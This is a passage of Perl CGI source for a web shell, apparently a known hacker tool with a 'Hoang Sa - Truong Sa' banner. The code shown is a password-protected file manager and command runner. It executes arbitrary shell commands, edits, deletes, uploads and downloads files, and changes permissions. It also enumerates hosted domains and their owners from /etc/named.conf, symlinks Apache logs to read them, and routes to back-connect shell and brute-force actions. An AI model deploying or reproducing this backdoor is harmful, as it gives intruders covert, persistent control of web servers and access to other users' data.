if(-r $file){ $ur = "r"; }
if(-w $file){ $uw = "w"; }
return $ur . " / " . $uw;
}else
{
$mode=(stat($file))[2];
$result = sprintf("%04o", $mode & 07777);
return $result;
}
}
return "0000";
}
sub FileLastModified($)
{
my $file = shift;
if(-e $file)
{
($la) = (stat($file))[9];
($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
$y = $y + 1900;
@month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
$lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
return $lmtime;
}
return "???";
}
sub FileSize($)
{
my $file = shift;
if(-f $file)
{
return -s $file;
}
return "0";
}
sub ParseFileSize($)
{
my $size = shift;
if($size <= 1024)
{
return $size. " B";
}
else
{
if($size <= 1024*1024)
{
$size = sprintf("%.02f",$size / 1024);
return $size." KB";
}
else
{
$size = sprintf("%.2f",$size / 1024 / 1024);
return $size." MB";
}
}
}
sub trim($)
{
my $string = shift;
$string =~ s/^\s+//;
$string =~ s/\s+$//;
return $string;
}
sub AddSlashes($)
{
my $string = shift;
$string=~ s/\\/\\\\/g;
return $string;
}
sub ListDir
{
my $path = $CurrentDir.$PathSep;
$path=~ s/\\\\/\\/g;
my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
if(-d $path)
{
my @fname = ();
my @dname = ();
if(opendir(DIR,$path))
{
while($file = readdir(DIR))
{
$f=$path.$file;
if(-d $f)
{
push(@dname,$file);
}
else
{
push(@fname,$file);
}
}
closedir(DIR);
}
@fname = sort { lc($a) cmp lc($b) } @fname;
@dname = sort { lc($a) cmp lc($b) } @dname;
$result .= "<div><table width='90%' class='listdir'>
<tr style='background-color: #ef1c1c57'><th>File Name</th>
<th style='width:100px;'>File Size</th>
<th style='width:150px;'>Owner</th>
<th style='width:100px;'>Permission</th>
<th style='width:150px;'>Last Modified</th>
<th style='width:260px;'>Action</th></tr>";
my $style="line";
my $i=0;
foreach my $d (@dname)
{
$style= ($style eq "line") ? "notline": "line";
$d = &trim($d);
$dirname=$d;
if($d eq "..")
{
$d = &ParentFolder($path);
}
elsif($d eq ".")
{
$d = $path;
}
else
{
$d = $path.$d;
}
$result .= "<tr class='$style'>
<td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
$result .= "<td>DIR</td>";
$result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
$result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
$result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
$result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a> | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
$result .= "</tr>";
$i++;
}
foreach my $f (@fname)
{
$style= ($style eq "line") ? "notline": "line";
$file=$f;
$f = $path.$f;
$view = "?dir=".$path."&view=".$f;
$result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
$result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
$result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
$result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
$result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
$result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
$result .= "</tr>";
$i++;
}
$result .= "</table></div>";
}
return $result;
}
sub ViewDomainUser
{
open (domains, '/etc/named.conf') or $err=1;
my @cnzs = <domains>;
close d0mains;
my $style="line";
my $result="<h5><font style='font: 15pt Verdana;color: #fff;'>Hoang Sa - Truong Sa</font></h5>";
if ($err)
{
$result .= ('<p>C0uldn\'t Bypass it , Sorry</p>');
return $result;
}else
{
$result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
}
foreach my $one (@cnzs)
{
if($one =~ m/.*?zone "(.*?)" {/)
{
$style= ($style eq "line") ? "notline": "line";
$filename= "/etc/valiases/".$one;
$owner = getpwuid((stat($filename))[4]);
$result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
}
}
$result .= '</table>';
return $result;
}
sub ViewLog
{
if($WinNT)
{
return "<h2><font style='font: 20pt Verdana;color: #fff;'>Don't run on Windows</font></h2>";
}
my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
my @pathlog=(
'/usr/local/apache/logs/error_log',
'/var/log/httpd/error_log',
'/usr/local/apache/logs/access_log'
);
my $i=0;
my $perms;
my $sl;
foreach my $log (@pathlog)
{
if(-w $log)
{
$perms="OK";
}else
{
chop($sl = `ln -s $log error_log_$i`);
if(&trim($ls) eq "")
{
if(-r $ls)
{
$perms="OK";
$log="error_log_".$i;
}
}else
{
$perms="<font style='color: red;'>Cancel<font>";
}
}
$result .=<<END;
<tr>
<form action="" method="post">
<td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
<td><input class="submit" type="submit" value="Try" /></td>
<input type="hidden" id="log_$i" name="c" value="less $log"/>
<input type="hidden" name="a" value="command" />
<input type="hidden" name="d" value="$CurrentDir" />
</form>
<td>$perms</td>
</tr>
END
$i++;
}
$result .="</table>";
return $result;
}
&ReadParse;
&GetCookies;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};
$Action = "command" if($Action eq "");
$CurrentDir = &trim($in{'d'});
$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
if($Action eq "login" || !$LoggedIn)
{
&PerformLogin;
}elsif($Action eq "gui")
{
&PrintPageHeader;
if(!$WinNT)
{
$chmod=int($in{'chmod'});
if(!($chmod eq 0))
{
$chmod=int($in{'chmod'});
$file=$CurrentDir.$PathSep.$TransferFile;
chop($result= `chmod $chmod "$file"`);
if(&trim($result) eq "")
{
print "<run> Done! </run><br>";
}else
{
print "<run> Sorry! You dont have permissions! </run><br>";
}
}
}
$rename=$in{'rename'};
if(!$rename eq "")
{
if(rename($TransferFile,$rename))
{
print "<run> Done! </run><br>";
}else
{
print "<run> Sorry! You dont have permissions! </run><br>";
}
}
$remove=$in{'remove'};
if($remove ne "")
{
$rm = $CurrentDir.$PathSep.$remove;
if(-d $rm)
{
&RmDir($rm);
}else
{
if(unlink($rm))
{
print "<run> Done! </run><br>";
}else
{
print "<run> Sorry! You dont have permissions! </run><br>";
}
}
}
print &ListDir;
}
elsif($Action eq "command")
{
&PrintPageHeader("c");
print &ExecuteCommand;
}
elsif($Action eq "save")
{
&PrintPageHeader;
if(&SaveFile($in{'data'},$in{'file'}))
{
print "<run> Done! </run><br>";
}else
{
print "<run> Sorry! You dont have permissions! </run><br>";
}
print &ListDir;
}
elsif($Action eq "upload")
{
&PrintPageHeader;
print &UploadFile;
}
elsif($Action eq "backbind")
{
&PrintPageHeader("clientport");
print &BackBind;
}
elsif($Action eq "bruteforcer")
{
&PrintPageHeader;
print &BruteForcer;
}elsif($Action eq "download")
{
print &DownloadFile;
}elsif($Action eq "checklog")
{
&PrintPageHeader;
print &ViewLog;
}elsif($Action eq "domainsuser")
{
&PrintPageHeader;
print &ViewDomainUser;
}elsif($Action eq "logout")
{
&PerformLogout;
}
&PrintPageFooter; |